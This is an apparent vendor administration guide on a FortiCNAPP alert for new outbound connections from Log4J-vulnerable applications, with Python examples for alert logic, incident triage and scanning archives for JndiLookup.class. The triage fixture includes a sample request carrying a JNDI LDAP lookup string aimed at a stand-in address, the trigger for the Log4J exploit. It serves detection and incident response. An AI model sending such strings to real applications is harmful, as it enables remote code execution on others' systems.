
Administration Guide

Outbound Connection From Vulnerable Application to an IP Address

This alert occurs when Lacework FortiCNAPP detects that a software application with the critical Java Log4J vulnerability has made an outbound connection to an external IP address that it has not contacted in the last 90 days. The IP address may already have been contacted by other parts of your deployment; what matters is that this vulnerable software had not contacted it until now.

The software can be a container image running on a cluster or a software binary on a host in which vulnerable Log4J Java class files were detected. Because the vulnerability allows remote code execution, it has its own alert type.
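The alert logic described above can be reproduced offline to understand exactly what does and does not fire it. The following is an added example, not FortiCNAPP code: it assumes connection telemetry in the constructed form (timestamp, host, process, destination IP), a constructed list of processes in which vulnerable Log4J class files were found, and a simple internal-range list to decide what counts as external. Everything else (the 90-day window, "new for this process" rather than "new for the deployment") follows the alert description.

```python
# Added example (not Lacework FortiCNAPP code): minimal reimplementation of the
# "vulnerable application contacts an IP it has not contacted in 90 days" logic.
import ipaddress
from datetime import datetime, timedelta

BASELINE_DAYS = 90

# Assumption: what counts as "internal". Organisations add their own public ranges here.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",   # RFC 1918
    "127.0.0.0/8", "169.254.0.0/16",                   # loopback, link-local
    "fc00::/7", "fe80::/10", "::1/128")]               # IPv6 ULA, link-local, loopback

# Constructed sample telemetry: (timestamp, host, process, destination IP). Not real data.
CONNECTIONS = [
    ("2024-01-05T10:00:00", "web-1", "/usr/bin/java", "203.0.113.10"),  # first contact
    ("2024-02-01T09:30:00", "web-1", "/usr/bin/java", "203.0.113.10"),  # seen 27 days ago
    ("2024-03-15T12:00:00", "web-1", "/usr/bin/java", "10.0.0.25"),     # internal, ignored
    ("2024-03-20T08:45:00", "web-2", "/usr/bin/curl", "198.51.100.7"),  # not a vulnerable process
    ("2024-04-02T14:22:31", "web-1", "/usr/bin/java", "198.51.100.7"),  # new for this process
    ("2024-04-03T09:00:00", "web-1", "/usr/bin/java", "203.0.113.10"),  # seen 62 days ago
    ("2024-08-01T09:00:00", "web-1", "/usr/bin/java", "203.0.113.10"),  # last seen 120 days ago
]

# Constructed: (host, process) pairs where vulnerable Log4J class files were found.
VULNERABLE_PROCESSES = {("web-1", "/usr/bin/java")}


def is_external(ip):
    """True unless the address falls in one of the internal ranges above."""
    addr = ipaddress.ip_address(ip)
    return not any(addr in net for net in INTERNAL_NETS)


def find_alerts(connections, vulnerable, baseline_days=BASELINE_DAYS):
    """Return (timestamp, host, process, ip) for every connection from a vulnerable
    process to an external IP that this same process has not contacted within
    baseline_days. Other processes contacting the IP do not suppress the alert."""
    last_seen = {}   # (host, process, ip) -> datetime of most recent contact
    alerts = []
    for ts, host, proc, ip in sorted(connections):   # ISO timestamps sort correctly
        when = datetime.fromisoformat(ts)
        key = (host, proc, ip)
        prev = last_seen.get(key)
        last_seen[key] = when
        if (host, proc) not in vulnerable or not is_external(ip):
            continue
        if prev is None or when - prev > timedelta(days=baseline_days):
            alerts.append((ts, host, proc, ip))
    return alerts


if __name__ == "__main__":
    for alert in find_alerts(CONNECTIONS, VULNERABLE_PROCESSES):
        print("ALERT", *alert)
```

Two things the sample makes visible: the curl connection from web-2 to 198.51.100.7 does not stop the later java connection to the same address from alerting, because the baseline is per vulnerable process; and an address that was contacted in the past fires again once the gap exceeds 90 days. In a real deployment the first 90 days of telemetry build the baseline, so the very first contact in this toy data set would normally fall in that learning window rather than alert.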

Why this alert is important

Log4J class files have been detected in this software, and a new outbound connection is the key indicator of the vulnerability being exploited. The vulnerability enables attackers to gain remote code execution, granting them complete control over the affected host or container.

The Log4J exploit involves sending a specially crafted string to a vulnerable application. When the application logs that string, Log4J evaluates the lookup it contains and makes an outbound call (typically LDAP or RMI) to an attacker-controlled domain or IP address, from which the attacker's code can be fetched and executed. Therefore, this alert potentially indicates exploitation activity targeting this application.

Why this might be just fine

Though this activity could indicate exploitation, there are legitimate reasons for an application to connect to a new IP address, such as a change to the application or its configuration, or a third-party service the application depends on moving to a new address.

Under certain circumstances, the risk of running Log4J-vulnerable software can be contained: for example, it can be isolated in a sandbox environment using tools like gVisor, or the DevOps team, in collaboration with the security team, can enforce strong network egress controls. Such measures, which restrict DNS requests and outbound network connections, mitigate the risk only if they cover every path the exploit can use; the callback can be made directly to an IP address, so blocking DNS resolution alone is not sufficient. Note also that this alert means the vulnerable process did reach the new address, so if egress controls were meant to prevent that, treat the alert as evidence of a gap in them.

However, patching or removing the Log4J-vulnerable software is the more reliable approach and should be prioritized, as security controls may have gaps or be inadvertently disabled.

Investigation

This alert requires thorough and careful investigation, as a new external connection from a process carrying vulnerable Log4J (CVE-2021-44228) class files is a strong indicator of exploitation.

When investigating this alert, consider the following questions:

  1. What triggered the connection? Why did it occur?
  2. Which process initiated the connection?
  3. Is the process a known and legitimate one, or is it unfamiliar or unexpected on this host?
  4. Is the connection a regular behavior of the mentioned process?
  5. What is the origin of the IP address involved in the connection?
  6. Has this IP address been associated with malicious behavior or flagged by our threat intelligence sources?
  7. Are other machines within our network establishing connections to this IP address?
  8. Were there any notable events or activities on the machine or resource just before or after the connection? Create a timeline of events to gain a comprehensive understanding.

When examining the Alert Details in the Lacework FortiCNAPP Console, direct your attention to the following critical areas:

  1. Determine the IP address involved by reviewing the Alert Description.
  2. Identify the origin of the connection, including the specific machine, user, and process involved.
  3. Examine the number of bytes exchanged and the direction of the data transfer by reviewing the Where section.
  4. To access information about the process, click the process or container name in the Alert Description. This will provide details about the process, including its runtime duration, prevalence on other machines, safety considerations, and any known threat information associated with it.
  5. To assess the frequency of connections initiated by the process, refer to the Alert Description. For instance, you can examine if a process such as /bin/foo has initiated 24 connections to 12 distinct IP addresses in the previous 14 days. This information will help you gauge the level of activity associated with the process.
  6. Gather information about the IP address, including details such as Whois registration, historical Whois records, reverse DNS information, and historical rDNS data. Determine if the IP address is flagged as known malicious by any sources or if there are any indications of malicious activity associated with it.
  7. Identify other machines on your network connected to the same IP address by clicking the IP address in the alert. This information helps to understand the scope of the connection activity.
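The scoping questions above (how often the process connects out, which other machines contacted the address, and what happened on the machine around the connection) can be answered from exported telemetry without the console. The following is an added example, not FortiCNAPP code: it assumes a constructed event list in the form (timestamp, host, kind, detail) and a constructed alert record; the JNDI lookup string in the sample HTTP request is the publicly documented form of the crafted string the exploit uses, included only so the timeline has something to show.

```python
# Added example (not Lacework FortiCNAPP code): offline triage helpers for the
# investigation questions, run over constructed telemetry.
from collections import Counter
from datetime import datetime, timedelta

# The alert under investigation (constructed).
ALERT = {"time": "2024-04-02T14:22:31", "host": "web-1",
         "process": "/usr/bin/java", "ip": "198.51.100.7"}

# Constructed events: (timestamp, host, kind, detail). Not real telemetry.
# "connect" details are (process, destination IP); other kinds carry a string.
EVENTS = [
    ("2024-03-10T09:00:00", "web-1", "connect", ("/usr/bin/java", "203.0.113.10")),   # outside 14-day window
    ("2024-03-25T10:00:00", "web-1", "connect", ("/usr/bin/java", "203.0.113.10")),
    ("2024-03-30T11:00:00", "web-1", "connect", ("/usr/bin/java", "203.0.113.11")),
    ("2024-04-02T14:22:09", "web-1", "http_request", "GET /login ua=${jndi:ldap://198.51.100.7:1389/a}"),
    ("2024-04-02T14:22:31", "web-1", "connect", ("/usr/bin/java", "198.51.100.7")),   # the alert
    ("2024-04-02T14:22:33", "web-1", "process_start", "/usr/bin/java spawned /bin/sh"),
    ("2024-04-02T16:00:00", "web-3", "connect", ("/usr/bin/java", "198.51.100.7")),   # same IP, other host
    ("2024-04-02T18:00:00", "db-1", "connect", ("/usr/bin/psql", "10.0.0.5")),
]


def _t(ts):
    return datetime.fromisoformat(ts)


def process_activity(events, host, process, before, days=14):
    """Outbound connections by `process` on `host` in the `days` up to and including
    `before`. Returns (connection_count, distinct_ip_count), the figure the alert
    description summarises (e.g. '24 connections to 12 distinct IP addresses')."""
    end = _t(before)
    start = end - timedelta(days=days)
    ips = Counter(detail[1] for ts, h, kind, detail in events
                  if kind == "connect" and h == host and detail[0] == process
                  and start <= _t(ts) <= end)
    return sum(ips.values()), len(ips)


def other_hosts_to_ip(events, ip, exclude_host):
    """Hosts other than the alerting one that contacted `ip`: the scope of the activity."""
    return sorted({h for ts, h, kind, detail in events
                   if kind == "connect" and detail[1] == ip and h != exclude_host})


def timeline(events, host, center, minutes=5):
    """Every recorded event on `host` within +/- `minutes` of `center`, in time order."""
    c = _t(center)
    window = timedelta(minutes=minutes)
    return sorted(((ts, kind, detail) for ts, h, kind, detail in events
                   if h == host and abs(_t(ts) - c) <= window), key=lambda e: e[0])


if __name__ == "__main__":
    count, distinct = process_activity(EVENTS, ALERT["host"], ALERT["process"], ALERT["time"])
    print(f"{ALERT['process']} on {ALERT['host']}: {count} connections to {distinct} IPs in 14 days")
    print("other hosts contacting", ALERT["ip"], "->", other_hosts_to_ip(EVENTS, ALERT["ip"], ALERT["host"]))
    for ts, kind, detail in timeline(EVENTS, ALERT["host"], ALERT["time"]):
        print(ts, kind, detail)
```

The timeline is the part worth doing carefully: an inbound request carrying a lookup string seconds before the connection, followed by a child process spawned by the Java process, turns "new IP" into "exploitation succeeded", and a second host reaching the same address widens the incident beyond the alerting machine.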

Resolution

Follow these steps to resolve the alert:

  1. Apply patches or updates to address the vulnerability: upgrade Log4J to a fixed release (2.17.1 or later; 2.12.4 on the Java 7 branch, 2.3.2 on the Java 6 branch), or, where an upgrade is not immediately possible, remove the JndiLookup class from the log4j-core jar as an interim mitigation. Rebuild and redeploy affected container images rather than patching running containers. This may require downtime or disruption to the application, so you should plan accordingly. If the investigation indicates the exploit succeeded, isolate the host or container and preserve evidence before patching, as patching alone does not remove an attacker who already has a foothold.
  2. Implement additional security controls or hardening measures to prevent future attacks, such as egress firewall rules that limit the application's outbound connections to an allowlist, and intrusion detection rules for Log4J lookup strings in inbound requests.
  3. Monitor the system for further suspicious activity, such as additional connections or attempts to exploit the vulnerability.
  4. Conduct regular security assessments to identify vulnerabilities and ensure security controls work effectively.
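After patching, confirm on the host that no archive still ships the vulnerable lookup class, including jars nested inside WAR or fat-jar bundles, which is where missed copies usually hide. The following is an added example, not FortiCNAPP code: it assumes the standard log4j-core layout (the JndiLookup class path and the Maven pom.properties that records the version), treats 2.17.1, 2.12.4 and 2.3.2 as the fixed thresholds for their branches, and builds its own constructed fixtures so it runs offline.

```python
# Added example (not Lacework FortiCNAPP code): find archives that still contain
# Log4J's JndiLookup class and report the recorded log4j-core version.
import io
import os
import tempfile
import zipfile

JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_EXT = (".jar", ".war", ".ear", ".zip")


def parse_version(text):
    """(major, minor, patch) from strings like '2.14.1' or '2.17.1-SNAPSHOT'."""
    nums = []
    for part in text.strip().split(".")[:3]:
        digits = "".join(ch for ch in part if ch.isdigit())
        nums.append(int(digits) if digits else 0)
    while len(nums) < 3:
        nums.append(0)
    return tuple(nums)


def is_fixed(version):
    """Threshold used by this example: 2.17.1+ (Java 8), 2.12.4+ (Java 7 branch),
    2.3.2+ (Java 6 branch). Anything else with JndiLookup present is treated as vulnerable."""
    v = parse_version(version)
    return v >= (2, 17, 1) or (2, 12, 4) <= v < (2, 13, 0) or (2, 3, 2) <= v < (2, 4, 0)


def _scan_zip(zf, label, findings):
    names = set(zf.namelist())
    if JNDI_CLASS in names:
        version = "unknown"
        if POM_PROPS in names:
            for line in zf.read(POM_PROPS).decode("utf-8", "replace").splitlines():
                if line.startswith("version="):
                    version = line.split("=", 1)[1].strip()
        findings.append({"archive": label, "version": version,
                         "fixed": version != "unknown" and is_fixed(version)})
    # Recurse into nested archives in memory (fat jars, WAR/EAR bundles).
    for name in names:
        if name.lower().endswith(ARCHIVE_EXT):
            try:
                with zipfile.ZipFile(io.BytesIO(zf.read(name))) as inner:
                    _scan_zip(inner, f"{label}!{name}", findings)
            except zipfile.BadZipFile:
                continue


def scan_for_log4j(root):
    """Walk `root` and return one finding per archive (nested ones included) that
    contains JndiLookup.class, with the log4j-core version if it is recorded."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if not fn.lower().endswith(ARCHIVE_EXT):
                continue
            path = os.path.join(dirpath, fn)
            try:
                with zipfile.ZipFile(path) as zf:
                    _scan_zip(zf, path, findings)
            except zipfile.BadZipFile:
                continue
    return findings


def make_sample_archive(path, version, wrap_in_war=False):
    """Constructed fixture: a fake log4j-core jar (empty class entry, real
    pom.properties layout), optionally nested under WEB-INF/lib in a WAR."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as jar:
        jar.writestr(JNDI_CLASS, b"")
        jar.writestr(POM_PROPS, f"version={version}\nartifactId=log4j-core\n")
    data = buf.getvalue()
    if wrap_in_war:
        outer = io.BytesIO()
        with zipfile.ZipFile(outer, "w") as war:
            war.writestr("WEB-INF/lib/log4j-core.jar", data)
        data = outer.getvalue()
    with open(path, "wb") as f:
        f.write(data)
    return path


def demo_scan():
    """Build a vulnerable nested copy and a fixed top-level copy, then scan both."""
    with tempfile.TemporaryDirectory() as d:
        make_sample_archive(os.path.join(d, "app.war"), "2.14.1", wrap_in_war=True)
        make_sample_archive(os.path.join(d, "log4j-core-2.17.1.jar"), "2.17.1")
        return sorted(scan_for_log4j(d), key=lambda f: f["archive"])


if __name__ == "__main__":
    for finding in demo_scan():
        print(finding)
```

Run it against the application's deployment directory (or the unpacked container image layers) after patching; any finding with "fixed" False, or with an unknown version and the class still present, means the patch did not reach that copy. The nested-archive recursion is the point of the example: a fixed log4j-core jar next to a WAR that still bundles 2.14.1 under WEB-INF/lib is exactly the case a filename-based check misses.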
